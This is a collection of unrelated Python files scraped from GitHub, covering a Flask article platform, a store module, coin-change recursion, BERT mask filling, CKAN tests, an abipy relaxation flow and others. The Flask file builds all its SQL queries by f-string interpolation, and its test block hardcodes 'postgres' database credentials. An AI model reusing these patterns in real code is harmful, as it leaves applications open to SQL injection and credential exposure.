list(cursor.fetchall())\n name = article_desc[0][1]\n date = article_desc[0][5]\n cursor.execute(f\"SELECT * FROM public.article_writer WHERE article_id={article_id}\")\n check = list(cursor.fetchall())\n authors = \"\"\n for log in check:\n cursor.execute(f\"SELECT * FROM public.users WHERE id={log[1]}\")\n desc = list(cursor.fetchall())\n authors += desc[0][3] + \", \"\n authors=authors[0:len(authors)-2]\n topic = get_topic(article_id)\n reviews = '-'\n views = 0\n array += {'name': name, 'author': authors, 'topic': topic, 'views': views, 'reviews': reviews, 'date': date},\n return array\n\ndef select_table_personal():\n user_id = flask.session.get('user')\n cursor.execute(f\"SELECT * FROM public.article_writer WHERE user_id={user_id}\")\n 
records = list(cursor.fetchall())\n array = []\n for rec in records:\n article_id = rec[0]\n cursor.execute(f\"SELECT * FROM public.article WHERE id={article_id}\")\n article_desc = list(cursor.fetchall())\n name = article_desc[0][1]\n date = article_desc[0][5]\n cursor.execute(f\"SELECT * FROM public.article_writer WHERE article_id={article_id}\")\n check = list(cursor.fetchall())\n authors = \"\"\n for log in check:\n cursor.execute(f\"SELECT * FROM public.users WHERE id={log[1]}\")\n desc = list(cursor.fetchall())\n authors += desc[0][3] + \", \"\n authors=authors[0:len(authors)-2]\n topic = get_topic(article_id)\n reviews = get_rating(article_id)\n cursor.execute(f\"SELECT * FROM public.user_read WHERE article_id={article_id} and isread={True}\")\n views_check = list(cursor.fetchall())\n views = len(views_check)\n array += {'name': name, 'author': authors, 'topic': topic, 'views': views, 'reviews': reviews, 'date': date},\n return array\n\ndef select_reviews():\n #author, username, rate, review, date\n user_id = flask.session.get('user')\n article_id = flask.session.get('article_id')\n array = []\n cursor.execute(f\"SELECT * FROM public.article WHERE id={article_id}\")\n records = list(cursor.fetchall())\n if records != []:\n article_name = records[0][1]\n path = f\".\\\\reviews\\\\{article_name}.txt\"\n with open(path, \"r\") as text_file:\n lines = text_file.readlines()\n text_file.close()\n for line in lines:\n author_id = \"\"\n for i in range(len(line)):\n if line[i] == ':':\n start = i\n break\n else:\n author_id += line[i]\n if int(author_id) == int(user_id):\n continue\n else:\n review = line[start+1:]\n review = review[0:len(review)-2]\n cursor.execute(f\"SELECT * FROM public.users WHERE id={author_id}\")\n author_desc = list(cursor.fetchall())\n username = author_desc[0][1]\n author = author_desc[0][3]\n cursor.execute(f\"SELECT * FROM public.rating WHERE user_id={author_id} and article_id={article_id}\")\n rating_desc = list(cursor.fetchall())\n rate = rating_desc[0][4]\n date = rating_desc[0][3]\n array += {'author': author, 'username': username, 'rate': rate, 'comment': review, 'date': date},\n return array\n\n#for selecting articles aprooved recently\ndef select_table_recent():\n current_date = get_current_date() # get date\n user_id = flask.session.get('user') # get user id\n cursor.execute(f\"SELECT * FROM public.article WHERE isdeleted={False}\") # selecting all not deleted articles\n records = list(cursor.fetchall())\n array = []\n for rec in records:\n article_id = rec[0] # get article id\n name = rec[1] # get article name\n date = rec[5] # get date of aprooving article\n cursor.execute(f\"SELECT * FROM public.article_status WHERE article_id={article_id}\") # selecting articles's status\n check = list(cursor.fetchall())\n cursor.execute(f\"SELECT * FROM public.user_read WHERE user_id={user_id} and article_id={article_id}\") # checking which articles user has already read\n read_check = list(cursor.fetchall())\n if check[0][1] == 3 and (read_check[0][2] != True or rec[5] == current_date): # checking if article is aprooved, if user read current article or article was aprooved today \n cursor.execute(f\"SELECT * FROM public.article_writer WHERE article_id={article_id}\") # selecting article's authors\n article_desc = list(cursor.fetchall())\n authors = \"\"\n for log in article_desc: # getting authors of article\n cursor.execute(f\"SELECT * FROM public.users WHERE id={log[1]}\")\n desc = list(cursor.fetchall())\n authors += desc[0][3] + \", \"\n 
authors=authors[0:len(authors)-2]\n topic = get_topic(article_id) # getting article's topic\n reviews = get_rating(article_id) # getting article's rating \n cursor.execute(f\"SELECT * FROM public.user_read WHERE article_id={article_id} and isread={True}\")\n views_check = list(cursor.fetchall())\n views = len(views_check) # getting article's views\n array += {'name': name, 'author': authors, 'topic': topic, 'views': views, 'reviews': reviews, 'date': date}, # form array\n return array\n \n\n\n\"\"\" \nTESTS\nif __name__ == '__main__':\n time = str(datetime.datetime.now())\n time = time[0:10]\n print(time)\n array = select_table_desc()\n print(array)\n conn = psycopg2.connect(database=\"server_db\",\n user=\"postgres\",\n password=\"postgres\",\n host=\"localhost\",\n port=\"5432\")\n cursor = conn.cursor()\n cursor.execute(f\"SELECT * FROM role_user WHERE user_id=4\")\n records = list(cursor.fetchall())\n for i in range(len(records)):\n print(records[i], i)\n\nif __name__ == '__main__':\n path = f\".\\\\articles\\\\test3.txt\"\n with open(path, \"r\") as text_file:\n lines = text_file.readlines()\n text_file.close()\n print(lines)\n form_text(path)\n with open(\".\\\\reviews\\\\test2.txt\", \"w\") as file:\n file.write(\"\")\n file.close()\n with open(\".\\\\reviews\\\\test3.txt\", \"w\") as file:\n file.write(\"\")\n file.close()\n with open(\".\\\\reviews\\\\denis.txt\", \"w\") as file:\n file.write(\"\")\n file.close()\n path = f\".\\\\articles\\\\copy.txt\"\n with open(path, \"w\") as file:\n file.write(\"Your text goes here. And reads like this.\")\n text_file = open(path, \"r\")\n lines = text_file.readlines()\n print(lines[0])\n with open(\"copy.txt\", \"w\") as file:\n file.write(\"Your text goes here\")\n conn = psycopg2.connect(database=\"server_db\",\n user=\"postgres\",\n password=\"postgres\",\n host=\"localhost\",\n port=\"5432\")\n cursor = conn.cursor()\n cursor.execute(f\"SELECT * FROM role_user WHERE user_id=4\")\n records = list(cursor.fetchall())\n\"\"\"\n \n \n\n ","repo_name":"EKhudoborodov/Platform-server","sub_path":"functional.py","file_name":"functional.py","file_ext":"py","file_size_in_byte":24892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32099298554","text":"\"\"\"\nCreate a store module that will allow a store owner\nto MANAGE the store and a consumer to BUY\n\n\"\"\"\nimport os.path\nimport sys\nclass Product:\n base_dir = \"data\"\n\n def __init__(self, barcode, name, price):\n self.name = name\n self.price = price\n self.barcode = barcode\n self.check_dir()\n self.write()\n\n @property\n def name(self):\n return self.__name\n @property\n def price(self):\n return self.__price\n @property\n def barcode(self):\n return self.__barcode\n @name.setter\n def name(self, name):\n self.__name = name\n @price.setter\n def price(self, price):\n self.__price = price\n @barcode.setter\n def barcode(self, barcode):\n self.__barcode = barcode\n\n def check_dir(self):\n if not os.path.exists(self.base_dir):\n os.mkdir(self.base_dir)\n\n def write(self):\n f = open(self.base_dir + \"/\" + self.barcode + \".txt\", \"w\")\n f.write(f\"{self.name}\\n{self.price}\")\n f.close()\n @staticmethod\n def does_exist(barcode):\n return os.path.exists(Product.base_dir + \"/\" + barcode + \".txt\")\n\n @classmethod\n def get_product_by_barcode(cls, barcode):\n f = open(Product.base_dir + \"/\" + barcode + \".txt\", \"r\")\n contents = f.readlines()\n\n return cls(barcode=barcode, name=contents[0].strip(),\n 
price=float(contents[1].strip()))\n\ndef manage():\n \"\"\"\n Ask the store owner for: barcode, name, price\n ADD this product to a directory: many .txt files\n barcode.txt, where barcode = numbers\n \"\"\"\n while True:\n try:\n barcode = input(\"Enter barcode: \")\n name = input(\"Enter name: \")\n price = float(input(\"Enter price: \"))\n p = Product(name=name, price=price,\n barcode=barcode)\n answer = input(\"Do you want to add another product? y/n: \")\n if answer[0].lower() != \"y\":\n break\n except ValueError:\n print(\"Invalid Price\", file=sys.stderr)\n\n main()\ndef buy():\n summary = list()\n print(\"Welcome to our shopping center\")\n while True:\n answer = input(\"Enter barcode or (Q)uit to stop shopping\")\n if answer[0].lower() == \"q\":\n break\n if not Product.does_exist(answer):\n print(f\"Barcode {answer} does not exist\")\n else:\n p = Product.get_product_by_barcode(answer)\n summary.append(p)\n print(f\"You have added {p.name} to cart with price of {p.price}\")\n\n print(f\"Summary of items = Total Items {len(summary)}, Total Price \"\n f\"= { sum( [ item.price for item in summary ] ) }\")\n\n main()\ndef main():\n print(\"Welcome to our store\")\n choice = input(\"Do you want to MANAGE or BUY?: \")\n if choice[0].lower() == \"m\":\n manage()\n elif choice[0].lower() == \"b\":\n buy()\n else:\n print(\"Invalid option\", file=sys.stderr)\nif __name__ == '__main__':\n main()\n","repo_name":"ProfBlanc/comp2155Fall2023","sub_path":"wk3/friday-12pm/store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":3021,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"13166492046","text":"import os\n\nclass Package:\n def __init__(self, dpath):\n self.dpath = dpath\n \n def checkSql(self):\n print(\"这逼玩意儿胎神\")\n \n def checkCfg(self):\n print(\"是那个胎神嘛\")\n \n def checkFileNames(self):\n print(\"就是那个卅\")\n \n def PackCodes(self):\n print(\"二傻子\")\n \n def QuitOut(self):\n print(\"你给我滚吧!!\")\n return -1\n \n def main(self):\n print(\"###########################################################################\")\n print(\"##########输入要执行的操作: \")\n print(\"##########输入1:检查sql文件是否满足提版要求\")\n print(\"##########输入2:检查配置文件\")\n print(\"##########输入3:检查脚本命名是否规范\")\n print(\"##########输入4:代码打包\")\n print(\"##########输入e:退出程序\")\n print(\"###########################################################################\")\n while True:\n flag = input(\">>>>>>:\")\n print(\"Ready Go!~~\")\n if flag == \"1\":\n self.checkSql()\n elif flag == \"2\":\n self.checkCfg()\n elif flag == \"3\":\n self.checkFileNames()\n elif flag == \"4\":\n self.PackCodes()\n elif flag == \"e\":\n answerBox = input(\">>>>>是否确认退出:Y/N\")\n if answerBox == \"y\" or answerBox.upper() == \"Y\":\n ret = self.QuitOut()\n if ret == -1:\n break\n else:\n self.main()\n else:\n print(\"你他妈的都输入的啥子???~~~\")\nif __name__ == '__main__':\n dpath = \"123\"\n pack = Package(dpath)\n pack.main()","repo_name":"huangchao20/Jenkins_05","sub_path":"MyTools/随笔.py","file_name":"随笔.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7800560841","text":"def combinations(amount, coins: list):\n result = []\n\n def dfs(amount, coins, i, path, result):\n\n if i >= len(coins):\n return\n\n if amount < 0: # invalid base\n return\n\n if amount == 0: # valid case\n result.append([a for a in path])\n return\n\n # general case\n # call left child\n path.append(coins[i])\n 
dfs(amount-coins[i], coins, i, path, result)\n path.pop()\n\n # call right child\n dfs(amount, coins, i+1, path, result)\n\n dfs(amount, coins, 0, [], result)\n print(result)\n# return min(result)\n\n\ncombinations(20, [5, 10, 20])\n\n\ndef shortestCombination(amount, coins: list):\n\n def dfs(amount, coins, i, length) -> int:\n\n if i >= len(coins):\n return 10000\n\n if amount < 0: # invalid base\n return 10000\n\n if amount == 0: # valid case\n return length\n\n # general case\n # call left child\n length += 1\n left = dfs(amount-coins[i], coins, i, length)\n length -= 1\n\n # call right child\n right = dfs(amount, coins, i+1, length)\n\n return min(left, right)\n\n return dfs(amount, coins, 0, 0)\n\n\nprint(shortestCombination(20, [5, 10, 20]))\n\n# Time Complexity: O(2^n) where n is the number of input (coins)\n# Space Complexity: O(h) where h (amount) is the height of the tree\n","repo_name":"elemaryo/Leetcode-problems","sub_path":"coinChange.py","file_name":"coinChange.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32180953324","text":"#Alexandre Carle and Louis-philippe Rousseau\n#September 15, 2022\n#Last changed on September 22, 2022\n\nimport time\nfrom robot import Robot\nfrom Odomètre import Odomètre\n\nrobot = Robot()\nodomètre = Odomètre()\n\nodomètre.avancer_distance(100)\nrobot.Avancer()\nodomètre.attendre()\nrobot.Freiner()\ntime.sleep(1)\n \n","repo_name":"Alex6X9X/Conception_Enviro","sub_path":"Laboratoire_3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9040241869","text":"#!/usr/bin/env python\nimport vtk\nfrom vtk.test import Testing\nfrom vtk.util.misc import vtkGetDataRoot\nVTK_DATA_ROOT = vtkGetDataRoot()\n\n# Image pipeline\nreader = vtk.vtkPNGReader()\nreader.SetFileName(\"\" + str(VTK_DATA_ROOT) + \"/Data/fullhead15.png\")\nsmooth = vtk.vtkImageGaussianSmooth()\nsmooth.SetDimensionality(2)\nsmooth.SetStandardDeviations(1,1)\nsmooth.SetInputConnection(reader.GetOutputPort())\nimageAppend = vtk.vtkImageAppendComponents()\nimageAppend.AddInputConnection(reader.GetOutputPort())\nimageAppend.AddInputConnection(smooth.GetOutputPort())\nclip = vtk.vtkImageClip()\nclip.SetInputConnection(imageAppend.GetOutputPort())\nclip.SetOutputWholeExtent(0,255,0,255,20,22)\naccum = vtk.vtkImageAccumulate()\naccum.SetInputConnection(clip.GetOutputPort())\naccum.SetComponentExtent(0,255,0,255,0,0)\naccum.SetComponentSpacing(12,12,0.0)\nviewer = vtk.vtkImageViewer()\nviewer.SetInputConnection(accum.GetOutputPort())\nviewer.SetColorWindow(4)\nviewer.SetColorLevel(2)\nviewer.Render()\n# --- end of script --\n","repo_name":"HopeFOAM/HopeFOAM","sub_path":"ThirdParty-0.1/ParaView-5.0.1/VTK/Imaging/Core/Testing/Python/TestAccumulate.py","file_name":"TestAccumulate.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"72"} +{"seq_id":"34382080884","text":"from django.utils import timezone\nfrom django.shortcuts import render\n\n\ndef home(request):\n ctx = {}\n template = \"home/index.html\"\n ctx = {\n 'next_meetup': {\n 'date': timezone.datetime(2018, 9, 5, 18, 30)\n }\n }\n return render(request, template, 
ctx)\n","repo_name":"SLCPython/slcpy.com","sub_path":"slcpy/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14995124458","text":"# check if both parties have sent their \n\nimport json\nfrom pprint import pprint\nimport boto3\nfrom datetime import datetime\nimport uuid\n\ndef lambda_handler(event, context):\n \n client = boto3.resource(\"dynamodb\")\n table = client.Table(\"RequestHistory\")\n id = event['SenderID'] + '_' + str(uuid.uuid4())[:8]\n date = datetime.now().strftime('%Y-%m-%dT%H:%M:%SZ')\n \n response = table.put_item(\n Item = {\n 'SenderID' : event['SenderID'],\n 'Timestamp' : date,\n 'Sender' : event[\"Sender\"],\n 'Reciever' : event[\"Reciever\"],\n 'SenderBank' : event[\"SenderBank\"],\n 'RecieverBank' : event[\"RecieverBank\"],\n 'Description' : event[\"Description\"],\n 'Amount' : event[\"Amount\"],\n 'RequestID' : id,\n 'Fulfilled' : False\n }) \n \n \n return response\n","repo_name":"Xuzii/Venmo_of_Indo","sub_path":"backend/lamdba_function_requestTransaction.py","file_name":"lamdba_function_requestTransaction.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6713894895","text":"# pattern printing\n# Input = Integer n\n# Boolean = True or False\n#\n# True n=4\n# *\n# **\n# ***\n# ****\n#\n# False\n# ****\n# ***\n# **\n# *\n\ninp1=int(input(\"Enter the number of rows : \"))\ninp2=int(input(\"Enter the boolean value : \"))\nif inp2==True:\n i=0;\n while i. #\n# #\n###############################################################################\n\n__author__ = \"Josh Daly\"\n__copyright__ = \"Copyright 2015\"\n__credits__ = [\"Josh Daly\"]\n__license__ = \"GPL3\"\n__version__ = \"0.0.1\"\n__maintainer__ = \"Josh Daly\"\n__email__ = \"joshua.daly@uqconnect.edu.au\"\n__status__ = \"Development\"\n\n###############################################################################\n###############################################################################\n###############################################################################\n###############################################################################\n###############################################################################\n\nclass GreenGenesTaxonomy(object):\n def __init__(self, gg_tax_file):\n self._phylum = {}\n self._class = {}\n self._order = {}\n self._family = {}\n self.wrapper(gg_tax_file)\n \n def wrapper(self, gg_tax_file):\n self.grabGGTaxData(gg_tax_file)\n \n def grabGGTaxData(self, gg_tax_file):\n with open(gg_tax_file) as fh:\n for l in fh:\n whitespace = l.rstrip().split()\n gg_id = whitespace[0]\n gg_tax = whitespace[1:]\n try:\n __genus, __family, __order, __class, __phylum = self.getTaxonRanks(gg_tax)\n self.addTaxData(__genus, __family, __order, __class, __phylum)\n except IndexError:\n pass\n \n def getTaxonRanks(self, gg_tax):\n __genus = ''\n __family = ''\n __order = ''\n __class = ''\n __phylum = ''\n \n for taxon_rank in gg_tax:\n if 'p__' in taxon_rank:\n __phylum = self.removeSemiColon(taxon_rank).lower()\n elif 'c__' in taxon_rank:\n __class = self.removeSemiColon(taxon_rank).lower()\n elif 'o__' in taxon_rank:\n __order = self.removeSemiColon(taxon_rank).lower()\n elif 'f__' in taxon_rank:\n __family = self.removeSemiColon(taxon_rank).lower()\n elif 'g__' in taxon_rank:\n __genus = self.removeSemiColon(taxon_rank).lower()\n \n return 
__genus, __family, __order, __class, __phylum\n\n def removeSemiColon(self, taxon_rank):\n if ';' in taxon_rank:\n return taxon_rank[3:-1]\n else:\n return taxon_rank[3:]\n\n def addTaxData(self, __genus, __family, __order, __class, __phylum):\n if len(__genus) > 1:\n self._phylum[__genus] = __phylum\n self._class[__genus] = __class\n self._order[__genus] = __order\n self._family[__genus] = __family\n \n###############################################################################\n###############################################################################\n###############################################################################\n###############################################################################\n","repo_name":"JoshDaly/TrackMscripts","sub_path":"grab_gg_taxonomy.py","file_name":"grab_gg_taxonomy.py","file_ext":"py","file_size_in_byte":4042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38576261728","text":"\n__doc__=\"HP Blade Chassis Zen Pack\"\n\nimport Globals\nimport os\n\nfrom Products.CMFCore.DirectoryView import registerDirectory\nfrom Products.ZenModel.DeviceClass import manage_addDeviceClass\n\nskinsDir = os.path.join(os.path.dirname(__file__), 'skins')\nif os.path.isdir(skinsDir):\n registerDirectory(skinsDir, globals())\n\nfrom Products.ZenModel.ZenPack import ZenPackBase\n\nimport ZenPacks.community.HPBladeChassis\ndef initialize(registrar):\n registrar.registerClass(\n BladeServer.BladeServer,\n permission='Add DMD Objects',\n )\n\n\nclass ZenPack(ZenPackBase):\n \"\"\" HPBladeChassis loader\n \"\"\"\n\n def install(self, app):\n if not hasattr(app.zport.dmd.Devices, 'BladeChassis'):\n manage_addDeviceClass(app.zport.dmd.Devices, 'BladeChassis')\n dc = app.zport.dmd.Devices.getOrganizer('BladeChassis')\n dc.description = ''\n ZenPackBase.install(self, app)\n\n def upgrade(self, app):\n if not hasattr(app.zport.dmd.Devices, 'BladeChassis'):\n manage_addDeviceClass(app.zport.dmd.Devices, 'BladeChassis')\n dc = app.zport.dmd.Devices.getOrganizer('BladeChassis')\n dc.description = ''\n ZenPackBase.upgrade(self, app)\n\n def remove(self, app, leaveObjects=False):\n ZenPackBase.remove(self, app, leaveObjects)\n\n","repo_name":"zenoss/Community-Zenpacks","sub_path":"ZenPacks.community.HPBladeChassis/ZenPacks/community/HPBladeChassis/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"72"} +{"seq_id":"33462805575","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom transformers import BertTokenizer, BertForMaskedLM\nimport torch\n\ntokenizer = BertTokenizer.from_pretrained('bert-base-uncased')\nmodel = BertForMaskedLM.from_pretrained('bert-base-uncased')\n\n#input_text = \"I have [MASK] apples and [MASK] oranges and [MASK] bananas.\"\ninput_text = \"She is a [MASK] girl and she want to [MASK] with me on [MASK] and [MASK] me very much.\"\nnum_mask = input_text.count(\"[MASK]\")\n\nprint()\n\n# loop over the masked positions and predict each masked word\nfor i in range(num_mask):\n input = tokenizer.encode(input_text, return_tensors=\"pt\")\n mask_index = torch.where(input == tokenizer.mask_token_id)[1]\n\n output = model(input, return_dict=True)\n logits = output.logits\n\n mask_word = logits[0, mask_index, :]\n for j in range(mask_word.shape[0]):\n print('predicted_word, No.', j, 'MASK :')\n top_5_words = torch.topk(mask_word, 10, dim=1).indices[j].tolist()\n for token in top_5_words:\n predicted_word = 
tokenizer.decode([token])\n print(predicted_word, end=' ')\n print()\n\n top_5_words = torch.topk(mask_word, 10, dim=1).indices[0].tolist()\n all_predicted_text = input_text\n for token in top_5_words:\n predicted_word = tokenizer.decode([token])\n all_predicted_text = all_predicted_text.replace(\"[MASK]\", predicted_word, 1)\n print(f\"Predicted sentence: {all_predicted_text}\")\n all_predicted_text = input_text # restore the input_text for the next prediction\n\n # pick the highest-probability word and fill it into the sentence\n predicted_word = tokenizer.decode([top_5_words[0]])\n input_text = input_text.replace(\"[MASK]\", predicted_word, 1)\n\n print('-----')\n\n","repo_name":"zliu1022/py-ex","sub_path":"transformer/multi_mf_atte.py","file_name":"multi_mf_atte.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42331168171","text":"# encoding: utf-8\n\nimport pytest\n\nfrom ckan import model\nfrom ckan.tests import factories\n\n\n@pytest.mark.usefixtures(u\"clean_db\", u\"with_request_context\")\nclass TestPackage(object):\n def test_create(self):\n # Demonstrate creating a package.\n #\n # In practice this is done by a combination of:\n # * ckan.logic.action.create:package_create\n # * ckan.lib.dictization.model_save.py:package_dict_save\n # etc\n\n pkg = model.Package(name=u\"test-package\")\n pkg.notes = u\"Some notes\"\n pkg.author = u\"bob\"\n pkg.license_id = u\"odc-by\"\n\n model.Session.add(pkg)\n model.Session.commit()\n model.Session.remove()\n\n pkg = model.Package.by_name(u\"test-package\")\n assert pkg.notes == u\"Some notes\"\n assert pkg.author == u\"bob\"\n assert pkg.license_id == u\"odc-by\"\n assert pkg.license.title == u\"Open Data Commons Attribution License\"\n\n def test_update(self):\n dataset = factories.Dataset()\n pkg = model.Package.by_name(dataset[u\"name\"])\n\n pkg.author = u\"bob\"\n model.Session.commit()\n model.Session.remove()\n\n pkg = model.Package.by_name(dataset[u\"name\"])\n assert pkg.author == u\"bob\"\n\n def test_delete(self):\n group = factories.Group()\n dataset = factories.Dataset(\n groups=[{u\"id\": group[u\"id\"]}],\n tags=[{u\"name\": u\"science\"}],\n extras=[{u\"key\": u\"subject\", u\"value\": u\"science\"}],\n )\n pkg = model.Package.by_name(dataset[u\"name\"])\n\n pkg.delete()\n model.Session.commit()\n model.Session.remove()\n\n pkg = model.Package.by_name(dataset[u\"name\"])\n assert pkg.state == u\"deleted\"\n # it is removed from the group\n group = model.Group.get(group[\"id\"])\n assert [p.name for p in group.packages()] == []\n # other related objects don't change\n package_extra = model.Session.query(model.PackageExtra).all()[0]\n assert package_extra.state == u\"active\"\n package_tag = model.Session.query(model.PackageTag).all()[0]\n assert package_tag.state == u\"active\"\n tag = model.Session.query(model.Tag).all()[0]\n assert [p.name for p in tag.packages] == [dataset[u\"name\"]]\n\n def test_purge(self):\n org = factories.Organization()\n group = factories.Group()\n dataset = factories.Dataset(\n resources=[\n {\n u\"url\": u\"http://example.com/image.png\",\n u\"format\": u\"png\",\n u\"name\": u\"Image 1\",\n }\n ],\n tags=[{u\"name\": u\"science\"}],\n extras=[{u\"key\": u\"subject\", u\"value\": u\"science\"}],\n groups=[{u\"id\": group[u\"id\"]}],\n owner_org=org[u\"id\"],\n )\n pkg = model.Package.by_name(dataset[u\"name\"])\n\n pkg.purge()\n model.Session.commit()\n model.Session.remove()\n\n assert not model.Session.query(model.Package).all()\n # the purge cascades 
to some objects\n assert not model.Session.query(model.PackageExtra).all()\n assert not model.Session.query(model.PackageTag).all()\n assert not model.Session.query(model.Resource).all()\n # org remains, just not attached to the package\n org = model.Group.get(org[u\"id\"])\n assert org.packages() == []\n # tag object remains, just not attached to the package\n tag = model.Session.query(model.Tag).all()[0]\n assert tag.packages == []\n # group object remains, just not attached to the package\n group = model.Group.get(group[u\"id\"])\n assert group.packages() == []\n","repo_name":"OCHA-DAP/hdx-ckan","sub_path":"ckan/tests/model/test_package.py","file_name":"test_package.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"72"} +{"seq_id":"21914597920","text":"#!/usr/bin/env python\nr\"\"\"\nRelaxation with different k-meshes\n==================================\n\nIn this example, we employ the relaxation algorithms implemented in Abinit (``ionmov`` and ``optcell``)\nto find the equilibrium configuration of GaN (atomic positions and lattice vectors).\nThe relaxation is performed with different k-meshes to monitor the convergence of the results.\nYou will observe a change of the equilibrium parameters with respect to the k-point mesh.\n\nNote the we are using pseudopotentials generated with the GGA which tends to\noverestimate the lattice parameters and ecut is way too low.\nIf you replace GGA with LDA, you will observe that LDA tends to underestimate the parameters.\n\"\"\"\n\nimport sys\nimport os\n\nimport abipy.abilab as abilab\nimport abipy.flowtk as flowtk\nimport abipy.data as abidata\n\n\ndef build_flow(options):\n \"\"\"\n Build and return a flow performing structural relaxations with different k-point samplings.\n \"\"\"\n # Set working directory (default is the name of the script with '.py' removed and \"run_\" replaced by \"flow_\")\n if not options.workdir:\n options.workdir = os.path.basename(sys.argv[0]).replace(\".py\", \"\").replace(\"run_\", \"flow_\")\n\n # List of k-meshes.\n ngkpt_list = [\n [3, 3, 2],\n [6, 6, 4],\n [8, 8, 6],\n ]\n\n structure = abilab.Structure.from_file(abidata.cif_file(\"gan2.cif\"))\n pseudos = abidata.pseudos(\"Ga.oncvpsp\", \"N.oncvpsp\")\n\n # Build multidataset.\n multi = abilab.MultiDataset(structure=structure, pseudos=pseudos, ndtset=len(ngkpt_list))\n\n # Set global variables for structural relaxation. 
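The test_purge case above leans on delete cascades configured on CKAN's ORM models. A hedged sketch of how such cascades behave in plain SQLAlchemy, with hypothetical Package/PackageTag tables rather than CKAN's actual schema:

from sqlalchemy import Column, ForeignKey, Integer, String, create_engine
from sqlalchemy.orm import Session, declarative_base, relationship

Base = declarative_base()

class Package(Base):
    __tablename__ = "package"
    id = Column(Integer, primary_key=True)
    name = Column(String)
    # Deleting a Package also deletes its dependent PackageTag rows.
    tags = relationship("PackageTag", cascade="all, delete-orphan")

class PackageTag(Base):
    __tablename__ = "package_tag"
    id = Column(Integer, primary_key=True)
    package_id = Column(Integer, ForeignKey("package.id"))

engine = create_engine("sqlite://")
Base.metadata.create_all(engine)
with Session(engine) as session:
    session.add(Package(name="test-package", tags=[PackageTag()]))
    session.commit()
    session.delete(session.query(Package).one())  # cascades to the tag rows
    session.commit()
    assert session.query(PackageTag).count() == 0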
Note dilatmx and ecutsm\n # Ecut should depend on pseudos.\n multi.set_vars(\n ecut=15, # Too low\n optcell=2,\n ionmov=3,\n tolrff=5.0e-2,\n tolmxf=5.0e-5,\n ntime=50,\n dilatmx=1.05, # Important!\n ecutsm=0.5, # Important!\n )\n\n # Here we set the k-meshes (Gamma-centered for simplicity)\n for i, ngkpt in enumerate(ngkpt_list):\n multi[i].set_kmesh(ngkpt=ngkpt, shiftk=[0, 0, 0])\n\n # As the calculations are independent, we can use Flow.from_inputs\n # and call split_datasets to create len(ngkpt_list) inputs.\n # Note that it's a good idea to specify the task_class so that AbiPy knows how to restart the calculation.\n return flowtk.Flow.from_inputs(options.workdir, inputs=multi.split_datasets(),\n task_class=flowtk.RelaxTask)\n\n\n# This block generates the thumbnails in the AbiPy gallery.\n# You can safely REMOVE this part if you are using this script for production runs.\nif os.getenv(\"READTHEDOCS\", False):\n __name__ = None\n import tempfile\n options = flowtk.build_flow_main_parser().parse_args([\"-w\", tempfile.mkdtemp()])\n build_flow(options).graphviz_imshow()\n\n\n@flowtk.flow_main\ndef main(options):\n \"\"\"\n This is our main function that will be invoked by the script.\n flow_main is a decorator implementing the command line interface.\n Command line args are stored in `options`.\n \"\"\"\n return build_flow(options)\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n\n############################################################################\n# Run the script with:\n#\n# run_relax_vs_kpts.py -s\n#\n# then use:\n#\n# abirun.py flow_relax_vs_kpts hist -p\n#\n# to print (and plot) the relaxed parameters at the end of the run.\n#\n# .. code-block:: bash\n#\n# Table with final structures, pressures in GPa and force stats in eV/Ang:\n#\n# formula natom angle0 angle1 angle2 a b c volume \\\n# w0_t0 Ga2 N2 4 90.0 90.0 120.0 3.224 3.224 5.343 48.080\n# w0_t1 Ga2 N2 4 90.0 90.0 120.0 3.249 3.249 5.321 48.635\n# w0_t2 Ga2 N2 4 90.0 90.0 120.0 3.254 3.254 5.335 48.909\n#\n# abispg_num num_steps final_energy final_pressure task_class \\\n# w0_t0 None 9 -755.344 -1.088e-04 RelaxTask\n# w0_t1 None 9 -755.632 -5.088e-03 RelaxTask\n# w0_t2 None 11 -755.645 -4.314e-03 RelaxTask\n#\n# ncfile status\n# w0_t0 flow_relax_vs_kpts/w0/t0/outdata/out_HIST.nc Completed\n# w0_t1 flow_relax_vs_kpts/w0/t1/outdata/out_HIST.nc Completed\n# w0_t2 flow_relax_vs_kpts/w0/t2/outdata/out_HIST.nc Completed\n#\n# The experimental results are:\n#\n# * Volume of the unit cell of GaN: 45.73 A^3\n# * Lattice parameters of GaN: a = 3.190 A, c = 5.189 A\n# * Vertical distance between Ga and N : about 0.377 * c [ Schulz & Thiemann, 1977]\n#\n# .. 
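A toy convergence check in the spirit of this flow, using the relaxed lattice parameters from the run summary printed above; the 0.01 Angstrom tolerance is an arbitrary assumption for illustration, and no Abinit run is needed.

results = {  # ngkpt -> (a, c) in Angstrom, copied from the abirun.py table
    (3, 3, 2): (3.224, 5.343),
    (6, 6, 4): (3.249, 5.321),
    (8, 8, 6): (3.254, 5.335),
}
tol = 0.01  # Angstrom (assumption)
meshes = list(results)
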